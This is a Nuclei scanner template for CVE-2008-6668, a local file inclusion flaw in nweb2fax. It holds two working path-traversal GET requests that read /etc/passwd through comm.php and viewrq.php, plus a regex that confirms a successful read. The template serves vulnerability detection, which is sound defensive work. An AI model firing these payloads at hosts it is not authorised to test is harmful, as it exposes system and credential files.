id: CVE-2008-6668 info: name: nweb2fax <=0.2.7 - Local File Inclusion author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/5856 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 epss-percentile: 0.71607 cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: dirk_bartley product: nweb2fax tags: cve,cve2008,nweb2fax,lfi,traversal,edb,dirk_bartley http: - method: GET path: - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a00463044022060c84de88a71ccf8b996bea22ac6b62a2e003d9b3b8689c2d617d3e2f1ad99bc02202c59470b8795792f83ecbf5e7c7b37395db50a218f420b0fa76f2accc49d815f:922c64590222798bb761d5b6d8e72950